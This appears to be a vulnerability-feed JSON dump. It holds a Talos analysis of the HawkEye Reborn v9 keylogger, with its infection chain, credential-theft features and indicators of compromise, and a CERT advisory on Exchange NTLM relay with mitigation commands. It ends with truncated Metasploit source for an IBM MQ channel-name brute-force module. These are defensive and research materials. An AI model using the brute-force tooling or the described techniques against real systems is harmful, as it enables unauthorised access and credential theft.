{"talosblog": [{"lastseen": "2019-04-24T16:19:06", "bulletinFamily": "blog", "description": "[](<https://3.bp.blogspot.com/-fsip1EtsTi8/XLSoJ5Dy5zI/AAAAAAAABA0/0RFLYl6M7gEkd5gJZ7ny8_6CqYGQdB2PACLcBGAs/s1600/image2.jpg>)\n\n_[Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>) and [Holger Unterbrink](<http://blogs.cisco.com/author/holgerunterbrink>) authored this blog post._ \n \n\n\n## Executive summary\n\n \nMalware designed to steal sensitive information has been a threat to organizations around the world for a long time. The emergence of the greyware market and the increased commercialization of keyloggers, stealers, and remote access trojans (RATs) has magnified this threat by reducing the barrier to entry for attackers. In many cases, the adversaries leveraging these tools do not need to possess programming skills or in-depth computer science expertise, as they are now being provided as commercial offerings across the cybercriminal underground. We have previously released in-depth analyses of these types of threats and how malicious attackers are leveraging them to attack organizations with [Remcos in August](<https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html>) and [Agent Tesla in October](<https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html>). \n \nHawkEye is another example of a malware kit that is actively being marketed across various hacking forums. Over the past several months, Talos observed ongoing malware distribution campaigns attempting to leverage the latest version of the HawkEye keylogger/stealer, HawkEye Reborn v9, against organizations to steal sensitive information and account credentials for use in additional attacks and account compromise. \n \n\n\n## History of HawkEye\n\n \nHawkEye is a malware kit that has been around for several years and has seen continuous development and iterations since at least 2013. It is commonly sold on various hacking forums as a keylogger and stealer that can be used to monitor systems and exfiltrate information from those systems. It features robust stealing capabilities as it can be used to obtain sensitive information from a variety of different applications. This information can then be transmitted to the attacker using protocols such as FTP, HTTP, and SMTP. Talos has recently identified several changes concerning HawkEye Reborn in the latest version, HawkEye Reborn v9. \n \nIn December 2018, a thread on HackForums described a change in the ownership and ongoing development of the HawkEye keylogger. \n\n\n[](<https://4.bp.blogspot.com/-YOKYK7nA_LY/XLSoPx3B5ZI/AAAAAAAABA4/nVJRW-hm9gwFnXSHqwa26gbdCOeKeCHRACLcBGAs/s1600/image28.png>)\n\nShortly following this exchange, new posts began to appear that were attempting to market and sell new versions of HawkEye (HawkEye Reborn v9), with these new posts also referencing the change in ownership of the project moving forward. \n\n\n[](<https://2.bp.blogspot.com/-PfHSLXhS3v4/XLSoUi-yi5I/AAAAAAAABA8/NqfT1TqiwpwI-Tj1l_jE6N_RakRkUitMgCLcBGAs/s1600/image14.png>)\n\nHawkEye Reborn v9 is currently marketed as an \"Advance Monitoring Solution.\" It is currently being sold using a licensing model, with purchasers gaining access to the software and updates for different periods based on a tiered pricing model. \n\n\n[](<https://3.bp.blogspot.com/-nVLC2xeWfVY/XLSoY_zVwmI/AAAAAAAABBA/ShgUQIkoEccFQNv-bKaJzZloYx-CmeL1wCLcBGAs/s1600/image19.png>)\n\nHawkEye Reborn v9 also features a Terms of Service agreement that provides some additional insight. While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries. \n\n\n[](<https://1.bp.blogspot.com/-QjcANPSbXuw/XLSoeG7OXuI/AAAAAAAABBI/01cQGbAPI1AJHT_qLW26wZP62FMNLjhPQCLcBGAs/s1600/image23.png>)\n\nFollowing these changes, the new developer of HawkEye Reborn has continued to make changes and we expect this to continue as long as the developer can monetize their efforts. \n\n\n[](<https://2.bp.blogspot.com/-XCF0ooXwiMQ/XLSojXSxjlI/AAAAAAAABBQ/EWx_PUY1XD0y1x7eMww8ZA675YR8IDQDQCLcBGAs/s1600/image21.png>)\n\nAs with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or \"for educational purposes,\" malicious attackers have been continuously leveraging it against various targets around the world. \n \n\n\n## Distribution campaigns\n\n \nFor several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger/stealer. The current version, HawkEye Reborn v9 has been modified from earlier versions and heavily obfuscated to make analysis more difficult. \n \nThe email campaigns that have been observed feature characteristics that are consistent with what is commonly seen with malspam campaigns, with the emails purporting to be associated with various documents such as invoices, bills of materials, order confirmations, and other corporate functions. An example of one of these emails is below: \n\n\n[](<https://4.bp.blogspot.com/-nnMClu2IVWQ/XLSonr4bazI/AAAAAAAABBY/-ux_RxNbshwLX1cR8plybcXGpjlp6PyegCLcBGAs/s1600/image7.jpg>)\n\n**Figure 1: Example email message**\n\n \nWhile the current email contains leverage malicious Microsoft Excel files, earlier campaigns have also been observed leveraging RTF and DOC files. Additionally, a small number of campaigns over this same period also made use of various file-sharing platforms like Dropbox for hosting the malicious documents rather than directly attaching them to the messages themselves. \n\n\n[](<https://2.bp.blogspot.com/-QS6w_CksYJs/XLSosxC-zcI/AAAAAAAABBg/Mjq0cA5nUYIkcUJEQnYgAA27KhpICx4zgCLcBGAs/s1600/image24.png>)\n\n**Figure 2: Example malicious Excel document**\n\n \nSimilar to the technique described in our previous blog about [Remcos](<https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html>), the contents of the documents have been intentionally made to appear as if they are blurry, with the user being prompted to enable editing to have a clearer view of the contents. \n \nAnother interesting characteristic of the malicious documents is that the metadata associated with the document files themselves also matches that found in many of the malicious documents that were previously being used to spread Remcos. \n\n\n[](<https://4.bp.blogspot.com/-ucQKz5uGWps/XLSozJq9_cI/AAAAAAAABBo/FPmc6M0EjvgWn5B8KZr_qy9GkdM_LIkWgCLcBGAs/s1600/image13.jpg>)\n\n**Figure 3: Document metadata**\n\n \nAdditionally, the creation and modification dates associated with these documents are shortly after we released a detailed analysis of Remcos distribution campaigns that were being observed throughout 2018. \n \nAssuming the victim opens the attachment, the infection process begins as described in the following section. \n \nMany of the distribution servers that are being used to host the HawkEye keylogger binaries that are retrieved during the infection process are hosting large numbers of malicious binaries and, in many cases, contain open directory listings that can be used to identify the scope of the infections that they are being used to facilitate. In many cases, additional stealers, RATs, and other malware were observed being hosted on the same web servers. \n \n\n\n## Analysis of HawkEye Reborn \n\n \nThe campaign starts with sending the aforementioned Excel sheets that exploit the well-known [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) vulnerability, an arbitrary code execution bug in Microsoft Office. The exploit works similarly to what we saw with [Agent Tesla](<https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html>) in October. It leverages a buffer overflow in the Equation Editor, which occurs if someone hands over a font name that's too long. The shellcode starts after the MTEF font tag \"08 13 36\" in this case. \n\n\n[](<https://2.bp.blogspot.com/-WxpBsP6lNWE/XLSo72CB_NI/AAAAAAAABBw/lwshDjqrrmwa1uNBL63iEJXMeCS2fPe5wCLcBGAs/s1600/image20.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-Ezp3PrHQB8A/XLSo_0PmDuI/AAAAAAAABB4/8Cmnfu03C4MFXU30HbMix6j2WLSa9oC9gCLcBGAs/s1600/image3.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-BPF8a9brsno/XLSpEO0fCKI/AAAAAAAABB8/aDnt1WNHhCQHZzG96-uuWb9biTU83DwRwCLcBGAs/s1600/image25.png>)\n\nAfter execution in the Equation Editor (EQNEDT32.EXE) context, it downloads the malicious data from the malware server as you can see in the ThreatGrid Process Timeline screenshot below. After a successful download, it creates and starts the RegAsm.exe process. \n\n\n[](<https://3.bp.blogspot.com/-8C-Z3N_cEcE/XLSpIWEPIaI/AAAAAAAABCA/oAzHtM2VkH42DpaxRfozcgNRGAMWFWDUQCLcBGAs/s1600/image22.png>)\n\nThis RegAsm.exe process is a heavily obfuscated AutoIT script compiled into a PE. After decompiling it from the PE file, it is heavily obfuscated and still almost unreadable. \n\n\n[](<https://2.bp.blogspot.com/-LAeWp4klBQM/XLSpNQSmlgI/AAAAAAAABCE/Taj11GUjky0vQyQkYi3-adDUhQwDhaq8ACLcBGAs/s1600/image16.png>)\n\nWe deobfuscated the script to understand how the infection process works. It first creates the \"winrshost\" mutex. Then, it extracts the final payload malware from two objects in the PE resource section (capisp1, appsruprov2). \n\n\n[](<https://3.bp.blogspot.com/-LkoKmpYlZI8/XLSpSlAwVFI/AAAAAAAABCI/3imcGZdkdSYvAdyXyLULSvqBOIUWrzc1ACLcBGAs/s1600/image31.png>)\n\nIt concatenates them and uses AES to decrypt the result, using the hardcoded key \"pydbdio\u2026\" which is handed over to the DecryptData function (see above). The screen capture below shows the decryption function. \n\n\n[](<https://4.bp.blogspot.com/-KJKN9kXAelA/XLSpWqvttxI/AAAAAAAABCQ/6VvUkgSF91864qKaULizw0llm4Wat7_CwCLcBGAs/s1600/image30.png>)\n\nIt then calls the StartAndPatchRegAsm function. \n\n\n[](<https://1.bp.blogspot.com/-VDSLuvBYhCE/XLSpacgofmI/AAAAAAAABCY/YK7E0pWtUpkaJEyZ_7AZrigJTR28NOU1gCLcBGAs/s1600/image5.png>)\n\nThis function tries to find the original Microsoft RegAsm executable path. It hands over the decrypted buffer extracted from the resource section and the path from the original RegAsm executable to the start_protect_hexcode function. \n\n\n[](<https://4.bp.blogspot.com/-w-kCXgz3u0o/XLSpeBlFHnI/AAAAAAAABCg/JKhf2gJXxgQbeRTam8rQd2GPf10pYTpMwCLcBGAs/s1600/image18.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-ZTDot3VU9JU/XLSphqlp3mI/AAAAAAAABCk/bCasK40QdFAp0Gh4wVivdix4YJr-ZOCtgCLcBGAs/s1600/image26.png>)\n\nThen it starts the process-hollowing shellcode, which is stored in the HEXCODE1 variable. This shellcode injects the final payload taken from the resource section into the original RegAsm.exe process. The shellcode in HEXCODE1 is very similar to this [RunPE](<https://github.com/Zer0Mem0ry/RunPE/blob/master/RunPE.cpp>) example. \n \nThe AutoIT script is offering a lot of other functions which are not used in this campaign, like anti-virtual machine detection, USB drive infection and others. \n\n\n[](<https://3.bp.blogspot.com/-vh6Xq3TzaqE/XLSqd44BI8I/AAAAAAAABC8/gyzDKfaB2LgXQ41UHSI30LB90bSp5h91QCLcBGAs/s1600/image29.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-IuVHzBC8njQ/XLSqhnzC8VI/AAAAAAAABDA/sOxJqPwVPKsiWUJKATHD0oUYlsAJbPInQCLcBGAs/s1600/image27.png>)\n\nThe final payload \u2014 which we found in the AutoIT PE file resource section and was started by the process-hollowing shellcode \u2014 is a .NET PE file that's obfuscated with ConfuserEx. \n\n\n[](<https://4.bp.blogspot.com/-u3hzMzatksk/XLSqmJo1I3I/AAAAAAAABDE/uGg8D0kUXDQzoWy8CP7zLIm210QMK3geQCLcBGAs/s1600/image17.png>)\n\nDeobfuscated, we can see it is the HawkEye Keylogger \u2014 Reborn v9, Version=9.0.1.6. \n \nWhen HawkEye is executed, in line 34, \n\n \n \n byte[] byte_ = gclass.method_0()[\"0\", GClass30.GEnum3.RCDATA].Byte_0;\n\nit reads the encrypted configuration from the RCDATA resource and in line 33, \n\n \n \n byte[] byte_2 = GClass29.smethod_12(byte_, GClass12.string_0);\n\nand then decrypts this data with the Rijndael algorithm you can see below in the RijndaelManaged function to initialize the HawkEye configuration settings. \n\n\n[](<https://3.bp.blogspot.com/-iXF2q1vPsH0/XLSqqwTAYlI/AAAAAAAABDI/QmDPS_rDMvs2FAsIKCxge5wi1Ymvy_igACLcBGAs/s1600/image8.png>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-dBd_LGk0GoU/XLSqujXRU2I/AAAAAAAABDM/nepniWiNAvssUFbZVBvTGEDstHQE-LC2gCLcBGAs/s1600/image15.png>)\n\nThe decrypted configuration shows us the account used for exfiltration: \n\n\n[](<https://1.bp.blogspot.com/-rHobq8SN4Ek/XLSq48SpP2I/AAAAAAAABDU/z81o8uAi_iUBte3aHusudOYT_dxsY0u0QCLcBGAs/s1600/image32.png>)\n\nThe main loop of HawkEye has the following functions: \n\n\n[](<https://3.bp.blogspot.com/-W9wmLGo3GCc/XLSq9HXTuLI/AAAAAAAABDc/sEzmCGsiRl0bdeuCiodV5pX0ZGis4OkrACLcBGAs/s1600/image1.png>)\n\nThis shows the rich feature set of HawkEye. The adversaries can get detailed information about the victim's machine, as you can see in the screenshot below. \n\n\n[](<https://1.bp.blogspot.com/-F1wPT8D1q04/XLSrBOdeGEI/AAAAAAAABDg/APiAE7rXSDsd8oJxaJgoQzUJjevl11gQgCLcBGAs/s1600/image11.png>)\n\nBeside the system information, it steals passwords from common web browsers, Filezilla, Beyluxe Messenger, CoreFTP and the video game \"Minecraft.\" It also starts a keylogger, steals clipboard content, takes screenshots from the desktop and pictures from the webcam. \n \nVersion 9 is still using the well-known MailPassView and WebBrowserPassView freeware tools from [Nirsoft](<http://www.nirsoft.net/>) to steal web and email passwords. These tools are embedded in the PE file in the form of data which is decoded at runtime and added to the local resources. Then, they are using the process hollowing technique to hide the execution of these tools inside of the original Microsoft vbc.exe (VisualBasic Compiler) process. They are starting an instance of vbc.exe via ProcessCreate, injecting the tool and resume the threat. The stolen passwords are ending up in a temporary file, which is read in and added to the list of data to be exfiltrated. HawkEye offers the following exfiltration options based on the configuration: email, FTP, SFTP, HTTP POST to PanelURL API or ProxyURL. \n\n\n[](<https://2.bp.blogspot.com/-yoXzehs_JDk/XLSrFzfBKRI/AAAAAAAABDk/JoTgkmSCuR0doPgen3wWwGnVQ2LnWlrrACLcBGAs/s1600/image9.png>)\n\nAs mentioned above, in the comments of the main loop section, it also comes with several anti-analysis features, including starting an anti-debugging thread or disabling certain AV-related programs via the Image File Execution Options (IFEO) evasion technique by registering invalid debuggers that redirect and effectively disable various system and security applications. \n\n\n[](<https://4.bp.blogspot.com/-vjkuaPushUo/XLSrLErUWvI/AAAAAAAABDo/wTG74Vd6vPYKXhP0q0qaLukjx0vuxUvmQCLcBGAs/s1600/image6.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-Sp2PJW7BIq0/XLSrO9GaicI/AAAAAAAABDs/cLvxHbEJ2Oo70osruhvclw10eKOtRixKQCLcBGAs/s1600/image4.png>)\n\nThe following diagram summarizes the full infection process: \n\n\n[](<https://3.bp.blogspot.com/-zR71sgOYtYA/XLSrT_-UJ2I/AAAAAAAABDw/H1shNR4H5z0G6xXb_h9hK23wowyd2ySngCLcBGAs/s1600/image12.jpg>)\n\n \n\n\n## Conclusion\n\n \nRecent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward. HawkEye has been active across the threat landscape for a long time and will likely continue to be leveraged in the future as long as the developer of this kit can monetize their efforts. While the Terms of Service have been written in an attempt to absolve the developer of any wrongdoing, it is actively leveraged by malicious adversaries. Organizations should be aware of this and similar threats and deploy countermeasures such as Multi-Factor Authentication (MFA) solutions such as [Duo](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), to help reduce the impact of credential theft within their environments. Talos continues to monitor this threat as it changes to ensure that customers remain protected from this and other threats as they continue to emerge and evolve. \n \n\n\n## Coverage\n\nAdditional ways our customers can detect and block this threat are listed below. \n \n\n\n[](<https://3.bp.blogspot.com/-mlMbcYQ3qsI/Wyn1AySpA-I/AAAAAAAAAZ4/nZhPWCs28ZcGmAw112w9dm8l47WVleUbwCLcBGAs/s1600/image1.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as [Next-Generation Firewall (](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)[NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ ](<https://meraki.cisco.com/products/appliances>)[Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## Indicators of compromise\n\n \nThe following IOCs are associated with various malware distribution campaigns that were observed during the analysis of Hawkeye Reborn v9 activity. \n \n\n\n### Attachment hashes (SHA256)\n\n \nA list of hashes observed to be associated with malicious email attachments can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5cb4afcf1be50.txt>). \n \n\n\n### PE32 hashes (SHA256)\n\n \nA list of hashes observed to be associated with malicious PE32 executables can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5cb4b004a5a27.txt>). \n \n\n\n### Domains\n\n \nThe following domains have been observed to be associated with malware campaigns. \n \ntfvn[.]com[.]vn \nshirkeswitch[.]net \nguideofgeorgia[.]org \ngulfclouds[.]site \njhssourcingltd[.]com \nkamagra4uk[.]com \npioneerfitting[.]com \npositronicsindia[.]com \nscseguros[.]pt \nspldernet[.]com \ntoshioco[.]com \nwww[.]happytohelpyou[.]in \n \n\n\n### IP addresses\n\n \nThe following IP addresses have been observed to be associated with malware campaigns. \n \n112.213.89[.]40 \n67.23.254[.]61 \n62.212.33[.]98 \n153.92.5[.]124 \n185.117.22[.]197 \n23.94.188[.]246 \n67.23.254[.]170 \n72.52.150[.]218 \n148.66.136[.]62 \n107.180.24[.]253 \n108.179.246[.]138 \n18.221.35[.]214 \n94.46.15[.]200 \n66.23.237[.]186 \n72.52.150[.]218 \n \n\n\n### URLs:\n\n \nThe following URLs have been observed to be associated with malware campaigns. \n \nhttps[:]//a[.]pomf[.]cat/ \nhttp[:]//pomf[.]cat/upload[.]php \n \n", "modified": "2019-04-16T11:45:39", "published": "2019-04-16T11:45:39", "id": "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/oyNpZ0C4orY/hawkeye-reborn.html", "type": "talosblog", "title": "New HawkEye Reborn Variant Emerges Following Ownership Change", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2019-05-01T19:51:38", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Exchange 2013 and newer fail to set signing and sealing flags on NTLM authentication traffic, which can allow a remote attacker to gain the privileges of the Exchange server.\n\n### Description \n\nMicrosoft Exchange supports a API called [Exchange Web Services](<https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2010/dd877045\\(v%3Dexchg.140\\)>) (EWS). One of the EWS API functions is called [PushSubscriptionRequest](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pushsubscriptionrequest>), which can be used to cause the Exchange server to connect to an arbitrary website. Connections made using the PushSubscriptionRequest function will attempt to negotiate with the arbitrary web server using NTLM authentication. Starting with Microsoft Exchange 2013, the NTLM authentication over HTTP fails to set the NTLM [Sign](<https://msdn.microsoft.com/en-us/library/cc236707.aspx>) and [Seal](<https://msdn.microsoft.com/en-us/library/cc236707.aspx>) flags. The lack of signing makes this authentication attempt vulnerable to NTLM relay attacks.\n\nMicrosoft Exchange is by default configured with extensive privileges with respect to the Domain object in Active Directory. Because the Exchange Windows Permissions group has WriteDacl access to the Domain object, this means that the Exchange server privileges obtained using this vulnerability can be used to gain Domain Admin privileges for the domain that contains the vulnerable Exchange server. \n \n--- \n \n### Impact \n\nAn attacker that has credentials for an Exchange mailbox and also has the ability to communicate with both a Microsoft Exchange server and a Windows domain controller may be able to gain domain administrator privileges. It is also reported that an attacker without knowledge of an Exchange user's password may be able to perform the same attack by using an SMB to HTTP relay attack as long as they are in the same network segment as an Exchange user. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is mitigated by the[ Microsoft Exchange updates for CVE-2019-0686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0686>). This update will cause the Exchange server to not attempt NTLM authentication with hosts that it contacts as the result of a PushSubscriptionRequest API call. The versions of Exchange that contain this fix include:\n\n * Exchange Server 2010 Service Pack 3 Update Rollup 26\n * Exchange Server 2013 Cumulative Update 22\n * Exchange Server 2016 Cumulative Update 12\n * Exchange Server 2019 Cumulative Update 1\n \nThese updates also include the [fix for CVE-2019-0724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0724>), which removes some of the unnecessary privileges that are granted to an Exchange server in a default installation. This is a defense-in-depth update that can help mitigate the impact of exploitation of this vulnerability. \n--- \n \n**Disable EWS push/pull subscriptions** \n \nIf you have an exchange server that does not leverage EWS push/pull subscriptions, you can block the PushSubscriptionRequest API call that triggers this attack. In an Exchange Management Shell window, execute the following commands:\n\n`New-ThrottlingPolicy -Name NoEWSSubscription -ThrottlingPolicyScope Organization -EwsMaxSubscriptions 0` \n`Restart-WebAppPool -Name MSExchangeServicesAppPool` \n**Remove privileges that Exchange has on the domain object** \n \nPlease note that the following workaround was not developed by CERT and is not supported by Microsoft. Please test any workarounds in your environment to ensure that they work properly. \n \n<https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/Fix-DomainObjectDACL.ps1> is a PowerShell script that can be executed on either the Exchange Server or Domain Controller system. By default this script will check for vulnerable access control entries in the current active directory. When executed with Domain Admin privileges and the `-Fix` flag, this script will remove the ability for Exchange to write to the domain object. \n \nNote that if you encounter an error about Get-ADDomainController not being recognized, you will need to install and import the ActiveDirectory PowerShell module, and then finally run Fix-DomainObjectDACL.ps1 :\n\n`Import-Module ServerManager` \n`Add-WindowsFeature RSAT-AD-PowerShell` \n`Import-Module ActiveDirectory` \n`.\\Fix-DomainObjectDACL.ps1` \nIf the script reports that faulty ACE were found, run:\n\n`.\\``Fix-DomainObjectDACL.ps1 -Fix` \nPowerShell may be configured to block the execution of user-provided `.ps1` files. If this is the case, first find your current PowerShell execution policy:\n\n`Get-ExecutionPolicy`Temporarily allow the execution of the `Fix-DomainObjectDACL.ps1` script by running:\n\n`Set-ExecutionPolicy unrestricted`Once you are finished running the `Fix-DomainObjectDACL.ps1`script, set the policy back to the original value as reported by `Get-ExecutionPolicy`:\n\n`Set-ExecutionPolicy [POLICY]` \n**Consider additional workarounds** \n \nThe [blog post for this vulnerability](<https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>) contains several mitigations that may also help protect against this and similar vulnerabilities. \n--- \n \n### Vendor Information\n\n465632\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Microsoft\n\nNotified: January 26, 2019 Updated: February 20, 2019 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nMicrosoft is aware of this vulnerability and is working on a resolution\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV19000 7 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019 -0686 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019 -0724>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 8.3 | AV:A/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.5 | E:F/RL:W/RC:C \nEnvironmental | 7.5 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190007>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0686>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0724>\n * <https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange>\n * <https://docs.microsoft.com/en-us/dotnet/api/microsoft.exchange.webservices.data.pushsubscription?view=exchange-ews-api+>\n * <https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pushsubscriptionrequest>\n * <https://docs.microsoft.com/en-us/previous-versions/office/developer/exchange-server-2010/dd877045(v%3Dexchg.140)>\n * <https://msdn.microsoft.com/en-us/library/cc236702.aspx>\n * <https://msdn.microsoft.com/en-us/library/cc236707.aspx>\n\n### Acknowledgements\n\nThis vulnerability was publicly disclosed by Dirk-jan Mollema. \n\nThis document was written by Will Dormann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2019-0686](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0686>) \n---|--- \n**Date Public:** | 2019-01-21 \n**Date First Published:** | 2019-01-28 \n**Date Last Updated: ** | 2019-02-20 21:06 UTC \n**Document Revision: ** | 43 \n", "modified": "2019-02-20T21:06:00", "published": "2019-01-28T00:00:00", "id": "VU:465632", "href": "https://www.kb.cert.org/vuls/id/465632", "type": "cert", "title": "Microsoft Exchange server 2013 and newer are vulnerable to NTLM relay attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-04-10T18:04:59", "bulletinFamily": "exploit", "description": "This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.", "modified": "2018-11-20T22:24:17", "published": "2018-10-28T15:22:27", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Channel Name Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Channel Name Bruteforce',\n 'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent channel names to check\", 10]),\n OptPath.new('CHANNELS_FILE',\n [ true, \"The file that contains a list of channel names\"]\n )])\n end\n\n def create_packet(chan)\n packet = \"\\x54\\x53\\x48\\x20\"+ \t# StructID\n \"\\x00\\x00\\x01\\x0c\"+ \t\t# MQSegmLen\n \"\\x02\" +\t\t\t \t# Byte Order\n \"\\x01\" +\t\t\t \t# SegmType\n \"\\x01\" +\t\t\t\t# CtlFlag1\n \"\\x00\" +\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\t# LUWIdent\n \"\\x22\\x02\\x00\\x00\"+\t\t\t# Encoding\n \"\\xb5\\x01\" +\t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" +\t\t# StructID\n \"\\x0d\" +\t\t\t\t# FAP Level\n \"\\x26\" +\t\t\t\t# CapFlag1 - Channel Type\n \"\\x00\" +\t\t\t\t# ECapFlag1\n \"\\x00\" +\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x32\\x00\" +\t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" +\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" +\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" +\t\t# SegWrapVal\n + chan + \t\t\t\t# Channel name\n \"\\x20\" +\t\t\t\t# CapFlag2\n \"\\x20\" +\t\t\t\t# ECapFlag2\n \"\\x20\\x20\" +\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x20\\x20\\x20\\x20\" +\t\t# HBInterval\n \"\\x20\\x20\" +\t\t\t# EFLLength\n \"\\x20\" +\t\t\t\t# IniErrFlg2\n \"\\x20\" +\t\t\t\t# Reserved1\n \"\\x20\\x20\" +\t\t\t# HdrCprLst\n \"\\x20\\x20\\x20\\x20\\x2c\\x01\\x00\\x00\"+ # MSGCprLst1\n \"\\x8a\\x00\\x00\\x55\\x00\\xff\\x00\\xff\"+ # MsgCprLst2\n \"\\xff\\xff\" +\t\t\t# Reserved2\n \"\\xff\\xff\\xff\\xff\" +\t\t# SSLKeyRst\n \"\\xff\\xff\\xff\\xff\" +\t\t# ConvBySKt\n \"\\xff\" +\t\t\t\t# CapFlag3\n \"\\xff\" +\t\t\t\t# ECapFlag3\n \"\\xff\\xff\" +\t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" +\t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" +\t\t# 